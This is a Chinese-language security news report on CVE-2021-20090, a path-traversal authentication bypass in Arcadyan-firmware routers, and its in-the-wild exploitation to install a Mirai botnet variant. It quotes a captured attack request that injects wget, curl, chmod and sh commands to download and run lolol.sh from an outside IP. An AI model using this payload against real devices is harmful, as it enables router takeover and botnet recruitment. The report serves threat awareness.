研究人員發(fā)現(xiàn)9.9分漏洞在野利用,數(shù)百萬路由器設備受到影響。
CVE-2021-20090漏洞
CVE-2021-20090漏洞是Tenable研究人員8月3日公開的包含Arcadyan固件的路由器web接口路徑遍歷漏洞,CVSS評分9.9分。漏洞影響數(shù)百萬家用路由器設備和其他使用有漏洞的代碼庫的物聯(lián)網(wǎng)設備,包括部分互聯(lián)網(wǎng)服務提供商在內(nèi)的不少于17家廠商的產(chǎn)品受到影響。
CVE-2021-20090漏洞是一個路徑遍歷漏洞,可能引發(fā)認證繞過。成功利用該漏洞后,攻擊者可以完全接管有漏洞的設備。比如,Tenable研究人員已經(jīng)證明了如何在有漏洞的路由器上修改配置以啟用Telnet,并獲取訪問設備的root級shell訪問權限。
cve-2021-20090漏洞的技術細節(jié)參見:
https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
在野漏洞利用
Juniper安全研究人員在監(jiān)控一起惡意網(wǎng)絡活動流量時發(fā)現(xiàn)嘗試利用該漏洞的攻擊模式。攻擊者看似嘗試在受影響的路由器上使用腳本的方式來部署Mirai惡意軟件變種。
研究人員從今年2月18日開始監(jiān)控到該攻擊活動,原始的攻擊來源與IP地址27.22.80[.]19,通過HTTP POST方法:
POST /images/%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Darkaction=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
wget+http://212.192.241.72/lolol.sh;
curl+-O+http://212.192.241.72/lolol.sh;
chmod+777+lolol.sh;
sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
從該POST 請求中可以看出,攻擊者修改了被攻擊設備的配置信息使用“ARC_SYS_TelnetdEnable=1”來啟用Telnet,然后使用wget或curl從IP 地址212.192.241[.]72 處下載一個新的腳本,然后執(zhí)行。研究人員分析該腳本payload并確認是Mirai僵尸網(wǎng)絡變種。
從6月6日到7月23日,研究人員發(fā)現(xiàn)攻擊者開始利用其它的漏洞:
CVE-2020-29557 (DLink路由器)
CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)
CVE-2021-31755 (Tenda AC11)
CVE-2021-22502 (MicroFocus OBR)
CVE-2021-22506 (MicroFocus AM)
這表明該攻擊組織正通過添加新的漏洞利用不斷擴展其攻擊活動。